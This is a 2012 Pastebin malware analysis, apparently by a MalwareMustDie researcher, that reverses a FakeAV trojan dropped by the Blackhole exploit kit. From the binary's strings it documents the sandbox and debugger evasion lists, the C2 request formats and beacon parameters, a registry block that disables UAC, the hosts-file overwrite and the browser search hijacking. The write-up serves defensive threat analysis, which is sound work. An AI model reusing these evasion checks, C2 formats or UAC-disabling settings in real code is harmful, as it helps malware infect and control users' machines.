Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =======================================
- #malwareMustDie - BHEK2 dropped FAkeAV Trojan
- Reversing Analysis
- References: https://www.virustotal.com/file/72d25f65ba822eb314a43321546ccf698a4b30e51f37406c27846671543e621f/analysis/
- References: http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
- @unixfreaxjp ~]$ date
- Thu Dec 20 01:26:55 JST 2012
- =============================
- Trojan sent parameter formats:
- HTTP/1.1 GET hxxp://report.aaa.com/?I55520=%96%C7%A5%A2%D7%ABclj%98%D4i%9E%9Ffi%98m%A2gneg%C7%A8%D1%AE%99%97egh%A9%8B%E7%E5%AF%EB%A4%8D%85%5B%E8%9E%C9%A6jkmn%97%A1%A3%9Ck%D5%E4%9A%9B%8A%5B%A2%9B%94%AF%A9%A9%A3%A3%AAfmxf%ACx%9C%AFj%7Bzz%A2nmna%99%A4%9E%82iwwfa%A5%8B%E2%D4%E5%B1_eee%A3g%95%99eeef%A1eee%5E%93%9F%9Do%ABreb%60%A2%95%A1%B4%A7%98"
- Where "report.aaa.com" was resolved in the IP in jotted in the malicious hosts file.
- After self copied and deletion, the trojan activities are reversed as followings:
- // Registry aimed/coded to be searched...
- SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform\
- SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform\
- Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\
- // Detecting below software....
- // if softwares is detected the trojan won't run properly..
- // filename....
- cv.exe
- irise.exe
- IrisSvc.exe
- wireshark.exe
- dumpcap.exe
- ZxSniffer.exe
- Aircrack-ng Gui.exe
- observer.exe
- tcpdump.exe
- WinDump.exe
- wspass.exe
- Regshot.exe
- ollydbg.exe
- PEBrowseDbg.exe
- windbg.exe
- DrvLoader.exe
- SymRecv.exe
- Syser.exe
- apis32.exe
- VBoxService.exe
- VBoxTray.exe
- SbieSvc.exe
- SbieCtrl.exe
- SandboxieRpcSs.exe
- SandboxieDcomLaunch.exe
- SUPERAntiSpyware.exe
- ERUNT.exe
- ERDNT.exe
- EtherD.exe
- Sniffer.exe
- CamtasiaStudio.exe
- CamRecorder.exe
- Software\CommView
- // registry...
- SYSTEM\CurrentControlSet\Services\IRIS5
- Software\eEye Digital Security
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Wireshark
- SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\wireshark.exe
- SOFTWARE\ZxSniffer
- SOFTWARE\Cygwin
- SOFTWARE\Cygwin
- SOFTWARE\B Labs\Bopup Observer
- AppEvents\Schemes\Apps\Bopup Observer
- Software\B Labs\Bopup Observer
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Win Sniffer_is1
- Software\Win Sniffer
- SOFTWARE\Classes\PEBrowseDotNETProfiler.DotNETProfiler
- Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\Debugging Tools for Windows (x86)
- SYSTEM\CurrentControlSet\Services\SDbgMsg
- Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32
- Software\Syser Soft
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APIS32
- SOFTWARE\APIS32
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest Additions
- SYSTEM\CurrentControlSet\Services\VBoxGuest
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sandboxie
- SYSTEM\CurrentControlSet\Services\SbieDrv
- Software\Classes\Folder\shell\sandbox
- Software\Classes\*\shell\sandbox
- // This is what this software will put in...
- SOFTWARE\SUPERAntiSpyware.com
- SOFTWARE\Classes\SUPERAntiSpywareContextMenuExt.SASCon.1
- SOFTWARE\SUPERAntiSpyware.com
- SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ERUNT_is1
- // Using DNSAPI.dll calls
- DnsFlushResolverCache
- // Using orig WS2_32.dll
- WSAWaitForMultipleEvents
- WSACreateEvent
- WSAEventSelect
- WSACloseEvent
- // WININET.dll
- DeleteUrlCacheEntryW
- InternetConnectA
- InternetQueryDataAvailable
- InternetReadFile
- HttpSendRequestW
- HttpOpenRequestA
- HttpAddRequestHeadersA
- InternetOpenA
- InternetCloseHandle
- //iphlpapi.dll
- GetAdaptersInfo
- // KERNEL32.dll
- eTime
- DeleteFileW
- CreateThread
- ExpandEnvironmentStringsW
- CreateFileA
- MoveFileExA
- GetFileAttributesA
- CreateDirectoryA
- SetFileAttributesA
- DeleteFileA
- FindFirstFileW
- GetVolumeInformationA
- GetVersionExW
- FindClose
- DeviceIoControl
- ExpandEnvironmentStringsA
- CopyFileA
- FindFirstFileA
- FindNextFileA
- WaitForSingleObjectEx
- lstrcatW
- GetTempFileNameW
- MoveFileExW
- WriteFile
- ReadFile
- CreateFileW
- GetTempPathW
- GetLocaleInfoA
- GetVolumeInformationW
- HeapAlloc
- HeapFree
- GetProcessHeap
- LocalAlloc
- CreateRemoteThread
- OpenProcess
- VirtualAllocEx
- ProcessIdToSessionId
- LocalFree
- WriteProcessMemory
- InterlockedDecrement
- SetEndOfFile
- GetFileSize
- SetFilePointer
- GetTickCount
- // USER32.dll
- FindWindowA
- DispatchMessageW
- CreateDialogParamW
- ShowWindow
- EndDialog
- ReleaseDC
- MessageBoxA
- IsDialogMessageW
- TranslateMessage
- GetDC
- wsprintfW
- BeginPaint
- SendMessageA
- KillTimer
- PostQuitMessage
- GetMessageW
- SetTimer
- DestroyWindow
- EndPaint
- wsprintfA
- // GDI32.dll
- GetObjectA
- GetObjectW
- CreateCompatibleBitmap
- CreateCompatibleDC
- SelectObject
- DeleteDC
- BitBlt
- // ADVAPI32.dll
- RegSetValueExA
- RegQueryValueExA
- RegEnumKeyExA
- RegOpenKeyExA
- RegQueryInfoKeyA
- GetUserNameA
- RegCloseKey
- RegCreateKeyExW
- AllocateAndInitializeSid
- RegEnumValueW
- FreeSid
- CheckTokenMembership
- RegSetValueExW
- InitializeSecurityDescriptor
- SetSecurityDescriptorDacl
- RegCreateKeyExA
- InitializeAcl
- AddAccessAllowedAce
- RegEnumValueA
- SetFileSecurityA
- CreateServiceW
- CloseServiceHandle
- OpenSCManagerW
- StartServiceW
- RegQueryValueExW
- RegOpenKeyExW
- // SHELL32.dll
- ShellExecuteW
- CommandLineToArgvW
- SHChangeNotify
- //OLEAUT32.dll
- CoUninitialize
- CreateStreamOnHGlobal
- CoInitialize
- CoCreateInstance
- CoInitializeSecurity
- CoInitializeEx
- ole32.dll
- // ntdll.dll
- NtConnectPort
- NtRequestWaitReplyPort
- RtlNtStatusToDosError
- NtClose
- NtDelayExecution
- NtCreateSection
- NtQuerySystemTime
- // urlmon.dll
- EnumProcesses
- GetProcessImageFileNameW
- PSAPI.DLL
- URLDownloadToFileW
- // Data to be prepared & passed to server/C2
- Cache-Control:
- Connection:
- Date:
- Pragma:
- Transfer-Encoding:
- Upgrade:
- Via:
- Age:
- Location:
- Proxy-Authenticate:
- Public:
- Retry-After:
- Server:
- Vary:
- Warning:
- WWW-Authenticate:
- Content-Length:
- Transfer-Encoding:
- ========================================
- First CNC comm structure (reversed code)
- ========================================
- // The structure of the C2 URL DOWNLOAD....
- update%s.%s.com
- // random seed chars...
- // + assembly of urls Pseudorandom...
- abcdefghijklmnopqrstuvwxyz0123456789
- $%s&%s%s$
- ?%c%c=%s
- // requested HTTP 1st download structure (begins w/ the user-agent)
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pre
- GET
- Host: %s
- ====================
- second comm
- ===================
- // how the encrypted info sent & its generator strings:
- $%s&controller=sign&data=%s&mid=%s$
- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
- // here we go...
- GET %s?%s HTTP/1.1
- Host: %s
- User-Agent: %s
- // accepted communication user-agent (marked the .NET)
- Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
- Mozilla/4.0 (compatible; MSIE 8.0; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.590; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
- // sending infected PC category
- POST %s HTTP/1.1
- Host: %s
- User-Agent: %s
- Content-Length: %d
- Content-Type: application/x-www-form-urlencoded
- // possibility checked OS + followed strings....
- wvNT
- wv2k
- wvME
- wvXP
- wv2k3
- wvVista
- wv2k8
- wvUnknown
- // this could be version of OS..
- %.08X%.08X%.08X%.08X
- %.01d%.03d%.03d%.03d%.02d%.08X
- wv=%s&uid=%d&lng=%s&mid=%s&res=%s&v=%08X
- //possibility domains structure:
- report.*
- *.com
- *.cfgbin
- // requested data
- HTTP/1.1
- GET
- Host: update1.randomstring.com <======= //noted this....
- User-Agent: IE7
- /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
- HTTP/1.1
- HEAD
- Host: update1.randomstring.com
- User-Agent: IE7
- <input type="hidden" name="%[^"]" value="%[^"] ">
- HTTP/1.1
- /update_c1eec.exe
- POST
- Host: update1.randomstring.com
- User-Agent: IE7
- /?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3
- HTTP/1.1
- GET
- Host: update1.randomstring.com
- User-Agent: IE7
- Data Buffer
- Build/13.0
- patch:0
- Version/10.0
- ver:2.0
- update/0
- Mod/0
- Service 1.0
- lib/5.0
- Library1.0
- App/7.0
- compat/0
- feed/7.1.0
- system:3.0
- control/5.0
- Engine/4.0
- runtime 11.0
- layout/2.0
- Build/14.0
- patch:10
- Version/11.0
- ver:3.0
- update/10
- Mod/3.0
- Service 2.0
- lib/6.0
- Library2.0
- App/8.0
- compat/4.1.0
- feed/7.2.0
- system:4.0
- control/6.0
- Engine/5.0
- runtime 12.0
- layout/3.0
- Build/15.0
- patch:20
- Version/12.0
- ver:4.0
- update/20
- Mod/4.0
- Service 3.0
- lib/7.0
- Library3.0
- App/9.0
- compat/4.2.0
- feed/7.3.0
- system:5.0
- control/7.0
- Engine/6.0
- runtime 13.0
- layout/4.0
- AppData
- \Mozilla\Firefox\Profiles\
- \prefs.js
- user_pref ( " general.useragent.extra.%[^"] " , " %[^"] " ) ;
- user_pref("general.useragent.extra.%s", "%s"); <=== // and this....
- // FakeAlert To be stored path...
- %appdata%\ScanDisc.exe
- %appdata%
- %s\%X.reg
- %s\mcp.ico
- // Making shortcuts...
- %s\mcp.ico
- shortcut
- shortcut
- My Computer
- .mcp
- //registry to be written:
- Windows Registry Editor Version 5.00
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
- "ConsentPromptBehaviorAdmin"=dword:0
- "ConsentPromptBehaviorUser"=dword:0
- "EnableLUA"=dword:0
- [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows]
- "update"="%s"
- Error opening file
- Size of file: %ld bytes.
- DEFAULT_PCID
- Unknown__
- Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\
- SusClientId
- Unknown__
- Software\Microsoft\Windows NT\CurrentVersion\
- ProductId
- Unknown__
- Unknown__
- // this is nasty.... son of the B'&%('&%( are grepping storage data...
- \\.\PhysicalDrive%d
- \\.\PhysicalDrive%d
- \\.\PhysicalDrive%d
- \\.\IDE21201.VXD
- \\.\Scsi%d:
- SCSIDISK
- Drive%dModelNumber
- Drive%dSerialNumber
- Drive%dControllerRevisionNumber
- Drive%dControllerBufferSize
- Drive%dType
- Removable
- Fixed
- Unknown
- WD-W
- IBM-
- MAXTOR
- Maxtor
- WDC
- %02X%02X%02X%02X%02X%02X
- InstallDate
- Software\Microsoft\Windows NT\CurrentVersion
- InstallDate = %X
- // overwrite the hosts file...
- C:\Windows\system32\drivers\etc\hosts
- //seek online source for hosts info...
- google-analytics
- http://findgala.com/?&uid=%d&q={searchTerms}
- // there goes thenew hosts structure wth new
- // %d.%d.%d.%d to be overwrite...
- C:\Windows\system32\drivers\etc\hosts.txt
- # Copyright (c) 1993-2006 Microsoft Corp.
- # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # This file contains the mappings of IP addresses to host names. Each
- # entry should be kept on an individual line. The IP address should
- # be placed in the first column followed by the corresponding host name.
- # The IP address and the host name should be separated by at least one
- # space.
- # Additionally, comments (such as these) may be inserted on individual
- # lines or following the machine name denoted by a '#' symbol.
- # For example:
- # 102.54.94.97 rhino.acme.com # source server
- # 38.25.63.10 x.acme.com # x client host
- 127.0.0.1 localhost
- ::1 localhost
- # Copyright (c) 1993-2006 Microsoft Corp.
- # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
- # This file contains the mappings of IP addresses to host names. Each
- # entry should be kept on an individual line. The IP address should
- # be placed in the first column followed by the corresponding host name.
- # The IP address and the host name should be separated by at least one
- # space.
- # Additionally, comments (such as these) may be inserted on individual
- # lines or following the machine name denoted by a '#' symbol.
- # For example:
- # 102.54.94.97 rhino.acme.com # source server
- # 38.25.63.10 x.acme.com # x client host
- 127.0.0.1 localhost
- ::1 localhost
- %d.%d.%d.%d
- //Now making a mess with your IE search settings
- \Software\Microsoft\Internet Explorer\SearchScopes
- DefaultScope
- URL
- \searchplugins\
- search.xml
- <ShortName>search</ShortName>
- <SearchPlugin xmlns="http://www.mozilla.org/2006/browser/search/">
- <Description>Search for the best price.</Description>
- <InputEncoding>windows-1251</InputEncoding>
- http://findgala.com/?
- <Url type="text/html" method="GET" template="%s">
- <Image width="16" height="16">data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAaRJREFUeNpiVIg5JRURw0A0YAHio943kYV%2B%2Ff33%2BdvvX7%2F%2FMjEx8nKycrGzwKXOiPKzICvdeezLhCV3jp15%2Bfv%2FX0YGhv8MDDxMX2qKTIw0RK10eYD6QYqATvoPBkt3f5K0W9Ew4fjTFz%2F%2Bw8Dm3W8UPeZxqFa%2BevsFyD0twgfVsOfkRxHrtfV9u5BVQ8Crd98%2FffkGYQM1QJ20%2FfSPv79eNxQGYfpSVJADmcvEAHbr7oOX2dj%2FERNKIA2%2F%2F%2Fz%2FxfCDhYVoDUDw5P6vf9%2B5iY0HVmZGQWm%2BN3fff%2Fn2k4eLHS739x%2FDiRs%2Ff%2F%2F5x8HO%2FOHzN3djfqgNjIwMgc6qzLx%2Fpy47j2zY%2Feff06tXhOUucgxeun33AUZGpHh4%2Bvo7t8EyIJqz%2FhpasD59%2B5dNrqdnznZIsEL9ICXCsWuBCwvTv%2FymS5PWPP32ExEALz%2F%2BB5r848cPCJcRaMP9xaYQzofPPzfuvrnj0Jst%2B5%2F8%2Bc4sLPeDkYlRgJc93VPE18NIXkYUmJYQSQMZ%2FP3379uPH7%2F%2F%2FEETBzqJ0WqLGvFpe2LCC4AAAwAyjg7ENzDDWAAAAABJRU5ErkJggg%3D%3D</Image>
- <Param name="q" value="{searchTerms}"/>
- <Param name="uid" value="%d"/>
- </Url>
- </SearchPlugin>
- search
- \prefs.js.bak
- browser.search.selectedEngine
- user_pref("browser.search.selectedEngine", "%s");
- user_pref("browser.search.selectedEngine", "%s");
- http://findgala.com/?&uid=%d&q={searchTerms}
- /chrome/report.html
- www.bing.com
- // Some uninstall info...
- Software\Microsoft\Windows\CurrentVersion\Uninstall
- SystemComponent
- ParentKeyName
- OperatingSystem
- DisplayName
- // Additional on innstalled save data path...
- c:\cgvi5r6i\vgdgfd.72g
- C:\file.exe
- ----
- #MalwareMustDie!!
Add Comment
Please, Sign In to add comment